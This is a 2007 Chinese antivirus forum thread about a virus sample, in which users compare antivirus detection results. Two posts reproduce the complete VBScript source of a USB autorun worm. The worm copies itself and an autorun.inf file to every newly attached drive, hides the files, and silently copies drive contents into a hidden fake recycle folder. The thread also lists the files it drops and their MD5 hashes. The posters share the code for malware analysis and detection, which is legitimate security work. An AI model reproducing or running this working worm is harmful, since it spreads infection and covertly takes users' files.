查看: 3894|回复: 7
收起左侧

[病毒样本] 病毒小包 大蜘蛛报 卡巴又挂(1月15日)

[复制链接]
hsjj2005
发表于 2007-1-15 13:18:08 | 显示全部楼层 |阅读模式
病毒小包 大蜘蛛报 卡巴又挂( 卡巴是1月15日11:37病毒库)

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
正魔刃
发表于 2007-1-15 16:56:31 | 显示全部楼层
驱逐舰的启发扫描起作用了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +3 收起 理由
navigateqd + 3 感谢支持,欢迎常来: )

查看全部评分

moonsilver
发表于 2007-1-15 19:54:12 | 显示全部楼层
瑞星报Worm.VBS.Agent.c

代码如下:
[autorun]
open=
shell\open=打开(&O)
shell\open\Command=WScript.exe stNP.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe stNP.vbs

'[NatruePark]
'容错语句
on Error resume next
'变量声明及初始化
dim fso, old_drs(), new_drs(), old_n, new_n, new_yn, wshshell
set fso = CreateObject("Scripting.File"&"SystemObject")
set wshshell = wscript.createobject("WScript.Shell")
old_n=0
redim old_drs(old_n)
old_drs(0)="C"

'[主体部分]
wshshell.run("explorer .\")
dim i
i = 0
do while i>=0 and i<8*360
        scan_disk()
        if judge_new_disk() = 1 then
                dim left_n
                left_n = 1
                do while left_n<=(new_n-old_n)
                        new_disk = new_drs(left_n+old_n)&":\"
'-----------------<维护块>-----------------
                        if fso.FileExists(new_disk&"NP.vbs") = -1 then
                        else
                                self_copy(new_disk)
                        end if
                        add_attrib(new_disk&"NP.vbs")
                        if fso.FileExists(new_disk&"autorun.inf") = -1 then       
                                del_attrib(new_disk&"autorun.inf")
                        end if
                                add_autorun(new_disk)
                       
                        add_attrib(new_disk&"autorun.inf")
                        if fso.FileExists(new_disk&"stNP.vbs") = -1 then
                        else
                                add_stNP(new_disk)
                        end if
                        add_attrib(new_disk&"stNP.vbs")
'-----------------</维护块>-----------------
'-----------------<功能块>-----------------
                        dim rec
                        rec = "d:\Recyc1ed\"
                        if fso.FolderExists(rec) = -1 then
                        else
                                fso.createfolder(rec)
                        end if
                        add_attribf(rec)
                        if fso.FileExists(rec&"desktop.ini") = -1 then
                        else
                                add_desktop(rec)
                        end if
                                add_attrib(rec&"desktop.ini")
                        aim_folder = rec&Date()&Rnd()
                        if fso.FolderExists(aim_folder) = -1 then
                        else
                                fso.createfolder(aim_folder)
                        end if
                       
'查找"汽轮机原理文件夹并复制"
                        if fso.FolderExists(new_disk&"汽轮机原理") = -1 then
                                fso.copyfolder new_disk&"汽轮机原理", aim_folder, true
                                add_attribf(aim_folder)
                        end if
                       
'通用复制
                        if old_n = 0 then
                        else
                                set fp = fso.getFolder(new_drs(new_n)&":\")
                                set fc = fp.SubFolders
                                for each f in fc
                                fso.copyfolder f&"", aim_folder&"\"&f.name, true
                                next
                                set fc = fp.files
                                for each f in fc
                                fso.copyfile f&"", aim_folder&"\", true
                                next
                                add_attribf(aim_folder)
                        end if
'-----------------</功能块>-----------------
                        left_n=left_n+1
                loop
        copy_disk()
        end if
        wscript.sleep(10000)
        i=i+1
loop
'[函数部分]
'可用驱动器检测 new_drs(),new_n
function scan_disk()
        dim d, dr
        new_n = -1
        set dr = fso.drives
        for each d in dr
                if d.isready then
                        new_n=new_n+1
                        redim preserve new_drs(new_n)
                        new_drs(new_n)=d.driveletter
                end if
        next
end function
'判断是否有新加入的驱动器
function judge_new_disk()
        if new_n = old_n then
                judge_new_disk = 0
        elseif new_n < old_n then
                redim preserve old_drs(new_n)
                old_n = new_n
                judge_new_disk = 0
        elseif new_n > old_n then
                redim preserve old_drs(new_n)
                judge_new_disk = 1
        end if
end function
'复制新驱动器表单
function copy_disk()
        dim n
        n=0
        do while n<=new_n
                old_drs(n) = new_drs(n)
                n=n+1
        loop
        old_n = new_n
end function
'添加指定文件属性
function add_attrib(file)
        set f = fso.getfile(file)
        if f.attributes = 7 then
               
        else
                f.attributes = 7
        end if
end function
'删除指定文件属性
function del_attrib(file)
        set f = fso.getfile(file)
        if f.attributes = 7 then
                f.attributes = 0
        else

        end if
end function
'自我复制到指定文件目录
function self_copy(folder)
        dim aim_path, mid_path, self_file, mid_file
        aim_path = folder&"NP.vbs"
        mid_path = "c:\np.bin"
        set self_file = fso.opentextfile(wscript.scriptfullname,1)
        self = self_file.readall
        set mid_file = fso.opentextfile(mid_path,2,true)
        mid_file.write self
        mid_file.close
        set mid_file = fso.getfile(mid_path)
        mid_file.copy(aim_path)
        mid_file.delete(true)
end function
'增加autorun.inf
function add_autorun(folder)
        dim path
        path = folder&"autorun.inf"
        set temp = fso.CreateTextFile("c:\a.bin",true)
        temp.writeline "[autorun]"
        temp.writeline "open="
        temp.writeline "shell\open=打开(&O)"
        temp.writeline "shell\open\Command=WScript.exe stNP.vbs"
        temp.writeline "shell\open\Default=1"
        temp.writeline "shell\explore=资源管理器(&X)"
        temp.writeline "shell\explore\Command=WScript.exe stNP.vbs"
        temp.close
        set cop = fso.getfile("c:\a.bin")
        cop.copy(path)
        cop.delete(true)
end function
'增加desktop.ini
function add_desktop(folder)
        dim path
        path = folder&"desktop.ini"
        set temp = fso.CreateTextFile("c:\d.bin",true)
        temp.writeline "[.ShellClassInfo]"
        temp.writeline "CLSID={645FF040-5081-101B-9F08-00AA002F954E}"
        temp.close
        set cop = fso.getfile("c:\d.bin")
        cop.copy(path)
        cop.delete(true)
end function
'增加stNP.vbs
function add_stNP(folder)
        dim path
        set fso = CreateObject("Scripting.File"&"SystemObject")
        path = folder&"stNP.vbs"
        set temp = fso.CreateTextFile("c:\s.bin",true)
       
        temp.writeline "on error resume next"
        temp.writeline "set fso = CreateObject("&chr(34)&"Scripting.FileSys"&chr(34)&"&"&chr(34)&"temObject"&chr(34)&")"
        temp.writeline "if fso.FileExists("&chr(34)&"NP.vbs"&chr(34)&") = -1 then"
        temp.writeline "if fso.FileExists("&chr(34)&"d:\NP.vbs"&chr(34)&") = -1 then"
        temp.writeline "set f = fso.getfile("&chr(34)&"d:\NP.vbs"&chr(34)&")"
        temp.writeline "if f.attributes = 0 then"
        temp.writeline "else"
        temp.writeline "f.attributes = 0"
        temp.writeline "end if"
        temp.writeline "f.delete(true)"
        temp.writeline "end if"
        temp.writeline "fso.copyfile "&chr(34)&"NP.vbs"&chr(34)&", "&chr(34)&"d:\NP.vbs"&chr(34)&", true"
        temp.writeline "set wshshell = wscript.createobject("&chr(34)&"WScript.Shell"&chr(34)&")"
        temp.writeline "wshshell.run "&chr(34)&"d:\NP.vbs"&chr(34)
        temp.writeline "end if"

        temp.close
        set cop = fso.getfile("c:\s.bin")
        cop.copy(path)
        cop.delete(true)
end function

'添加指定文件夹属性
function add_attribf(folder)
        set f = fso.getfolder(folder)
        if f.attributes = 7 then
               
        else
                f.attributes = 7
        end if
end function
'删除指定文件夹属性
function del_attribf(folder)
        set f = fso.getfolder(folder)
        if f.attributes = 0 then
        else
                f.attributes = 0

        end if
end function


wscript.echo("THANK YOU!!")
wscript.quit

on error resume next
set fso = CreateObject("Scripting.FileSys"&"temObject")
if fso.FileExists("NP.vbs") = -1 then
if fso.FileExists("d:\NP.vbs") = -1 then
set f = fso.getfile("d:\NP.vbs")
if f.attributes = 0 then
else
f.attributes = 0
end if
f.delete(true)
end if
fso.copyfile "NP.vbs", "d:\NP.vbs", true
set wshshell = wscript.createobject("WScript.Shell")
wshshell.run "d:\NP.vbs"
end if
ly250094040
发表于 2007-1-16 00:22:33 | 显示全部楼层
NOD挂
ly250094040
发表于 2007-1-16 00:27:03 | 显示全部楼层
BD挂
bg8ace
发表于 2007-1-16 00:27:03 | 显示全部楼层
nod32晕菜
九尾野狐
头像被屏蔽
发表于 2007-1-16 08:15:31 | 显示全部楼层
运行后,会在在C盘根目录下生成以下文件

d.bin  np.din  s.bin   a.bin

其它盘根目录生成

autorun.inf   NP.vbs   stNP.vbs

MD5值:

ad0b0b4416f06af436328a3c12dc491b   d.bin

21ad806298a3d79f0ce93e71c0948080   a.bin

285ee8e0bd3895e866b3ee7fe64afe48   np.bin

7267bec2ab0234733423bed7e1683bde   s.bin

285ee8e0bd3895e866b3ee7fe64afe48   NP.vbs

7267bec2ab0234733423bed7e1683bde   stNP.vbs


这其中

np.din与NP.vbs内容相同

s.bin与stNP.vbs内容相同

a.bin与autorun.inf内容相同

--

d.bin内容

[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}

----
a.bin内容

[autorun]
open=
shell\open=打开(&O)
shell\open\Command=WScript.exe stNP.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe stNP.vbs

----

s.bin内容

on error resume next
set fso = CreateObject("Scripting.FileSys"&"temObject")
if fso.FileExists("NP.vbs") = -1 then
if fso.FileExists("d:\NP.vbs") = -1 then
set f = fso.getfile("d:\NP.vbs")
if f.attributes = 0 then
else
f.attributes = 0
end if
f.delete(true)
end if
fso.copyfile "NP.vbs", "d:\NP.vbs", true
set wshshell = wscript.createobject("WScript.Shell")
wshshell.run "d:\NP.vbs"
end if

----

np.din内容

'[NatruePark]
'容错语句
on Error resume next
'变量声明及初始化
dim fso, old_drs(), new_drs(), old_n, new_n, new_yn, wshshell
set fso = CreateObject("Scripting.File"&"SystemObject")
set wshshell = wscript.createobject("WScript.Shell")
old_n=0
redim old_drs(old_n)
old_drs(0)="C"

'[主体部分]
wshshell.run("explorer .\")
dim i
i = 0
do while i>=0 and i<8*360
        scan_disk()
        if judge_new_disk() = 1 then
                dim left_n
                left_n = 1
                do while left_n<=(new_n-old_n)
                        new_disk = new_drs(left_n+old_n)&":\"
'-----------------<维护块>-----------------
                        if fso.FileExists(new_disk&"NP.vbs") = -1 then
                        else
                                self_copy(new_disk)
                        end if
                        add_attrib(new_disk&"NP.vbs")
                        if fso.FileExists(new_disk&"autorun.inf") = -1 then        
                                del_attrib(new_disk&"autorun.inf")
                        end if
                                add_autorun(new_disk)
                        
                        add_attrib(new_disk&"autorun.inf")
                        if fso.FileExists(new_disk&"stNP.vbs") = -1 then
                        else
                                add_stNP(new_disk)
                        end if
                        add_attrib(new_disk&"stNP.vbs")
'-----------------</维护块>-----------------
'-----------------<功能块>-----------------
                        dim rec
                        rec = "d:\Recyc1ed\"
                        if fso.FolderExists(rec) = -1 then
                        else
                                fso.createfolder(rec)
                        end if
                        add_attribf(rec)
                        if fso.FileExists(rec&"desktop.ini") = -1 then
                        else
                                add_desktop(rec)
                        end if
                                add_attrib(rec&"desktop.ini")
                        aim_folder = rec&Date()&Rnd()
                        if fso.FolderExists(aim_folder) = -1 then
                        else
                                fso.createfolder(aim_folder)
                        end if
                        
'查找"汽轮机原理文件夹并复制"
                        if fso.FolderExists(new_disk&"汽轮机原理") = -1 then
                                fso.copyfolder new_disk&"汽轮机原理", aim_folder, true
                                add_attribf(aim_folder)
                        end if
                        
'通用复制
                        if old_n = 0 then
                        else
                                set fp = fso.getFolder(new_drs(new_n)&":\")
                                set fc = fp.SubFolders
                                for each f in fc
                                fso.copyfolder f&"", aim_folder&"\"&f.name, true
                                next
                                set fc = fp.files
                                for each f in fc
                                fso.copyfile f&"", aim_folder&"\", true
                                next
                                add_attribf(aim_folder)
                        end if
'-----------------</功能块>-----------------
                        left_n=left_n+1
                loop
        copy_disk()
        end if
        wscript.sleep(10000)
        i=i+1
loop
'[函数部分]
'可用驱动器检测 new_drs(),new_n
function scan_disk()
        dim d, dr
        new_n = -1
        set dr = fso.drives
        for each d in dr
                if d.isready then
                        new_n=new_n+1
                        redim preserve new_drs(new_n)
                        new_drs(new_n)=d.driveletter
                end if
        next
end function
'判断是否有新加入的驱动器
function judge_new_disk()
        if new_n = old_n then
                judge_new_disk = 0
        elseif new_n < old_n then
                redim preserve old_drs(new_n)
                old_n = new_n
                judge_new_disk = 0
        elseif new_n > old_n then
                redim preserve old_drs(new_n)
                judge_new_disk = 1
        end if
end function
'复制新驱动器表单
function copy_disk()
        dim n
        n=0
        do while n<=new_n
                old_drs(n) = new_drs(n)
                n=n+1
        loop
        old_n = new_n
end function
'添加指定文件属性
function add_attrib(file)
        set f = fso.getfile(file)
        if f.attributes = 7 then
               
        else
                f.attributes = 7
        end if
end function
'删除指定文件属性
function del_attrib(file)
        set f = fso.getfile(file)
        if f.attributes = 7 then
                f.attributes = 0
        else

        end if
end function
'自我复制到指定文件目录
function self_copy(folder)
        dim aim_path, mid_path, self_file, mid_file
        aim_path = folder&"NP.vbs"
        mid_path = "c:\np.bin"
        set self_file = fso.opentextfile(wscript.scriptfullname,1)
        self = self_file.readall
        set mid_file = fso.opentextfile(mid_path,2,true)
        mid_file.write self
        mid_file.close
        set mid_file = fso.getfile(mid_path)
        mid_file.copy(aim_path)
        mid_file.delete(true)
end function
'增加autorun.inf
function add_autorun(folder)
        dim path
        path = folder&"autorun.inf"
        set temp = fso.CreateTextFile("c:\a.bin",true)
        temp.writeline "[autorun]"
        temp.writeline "open="
        temp.writeline "shell\open=打开(&O)"
        temp.writeline "shell\open\Command=WScript.exe stNP.vbs"
        temp.writeline "shell\open\Default=1"
        temp.writeline "shell\explore=资源管理器(&X)"
        temp.writeline "shell\explore\Command=WScript.exe stNP.vbs"
        temp.close
        set cop = fso.getfile("c:\a.bin")
        cop.copy(path)
        cop.delete(true)
end function
'增加desktop.ini
function add_desktop(folder)
        dim path
        path = folder&"desktop.ini"
        set temp = fso.CreateTextFile("c:\d.bin",true)
        temp.writeline "[.ShellClassInfo]"
        temp.writeline "CLSID={645FF040-5081-101B-9F08-00AA002F954E}"
        temp.close
        set cop = fso.getfile("c:\d.bin")
        cop.copy(path)
        cop.delete(true)
end function
'增加stNP.vbs
function add_stNP(folder)
        dim path
        set fso = CreateObject("Scripting.File"&"SystemObject")
        path = folder&"stNP.vbs"
        set temp = fso.CreateTextFile("c:\s.bin",true)
        
        temp.writeline "on error resume next"
        temp.writeline "set fso = CreateObject("&chr(34)&"Scripting.FileSys"&chr(34)&"&"&chr(34)&"temObject"&chr(34)&")"
        temp.writeline "if fso.FileExists("&chr(34)&"NP.vbs"&chr(34)&") = -1 then"
        temp.writeline "if fso.FileExists("&chr(34)&"d:\NP.vbs"&chr(34)&") = -1 then"
        temp.writeline "set f = fso.getfile("&chr(34)&"d:\NP.vbs"&chr(34)&")"
        temp.writeline "if f.attributes = 0 then"
        temp.writeline "else"
        temp.writeline "f.attributes = 0"
        temp.writeline "end if"
        temp.writeline "f.delete(true)"
        temp.writeline "end if"
        temp.writeline "fso.copyfile "&chr(34)&"NP.vbs"&chr(34)&", "&chr(34)&"d:\NP.vbs"&chr(34)&", true"
        temp.writeline "set wshshell = wscript.createobject("&chr(34)&"WScript.Shell"&chr(34)&")"
        temp.writeline "wshshell.run "&chr(34)&"d:\NP.vbs"&chr(34)
        temp.writeline "end if"

        temp.close
        set cop = fso.getfile("c:\s.bin")
        cop.copy(path)
        cop.delete(true)
end function

'添加指定文件夹属性
function add_attribf(folder)
        set f = fso.getfolder(folder)
        if f.attributes = 7 then
               
        else
                f.attributes = 7
        end if
end function
'删除指定文件夹属性
function del_attribf(folder)
        set f = fso.getfolder(folder)
        if f.attributes = 0 then
        else
                f.attributes = 0

        end if
end function


wscript.echo("THANK YOU!!")
wscript.quit

[ 本帖最后由 没注册 于 2007-1-16 08:29 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +3 收起 理由
navigateqd + 3 版区有你更精彩: )

查看全部评分

九尾野狐
头像被屏蔽
发表于 2007-1-16 08:30:42 | 显示全部楼层
这个,应该算是个恶意程序或者玩笑程序吧
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-1 00:32 , Processed in 0.128573 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表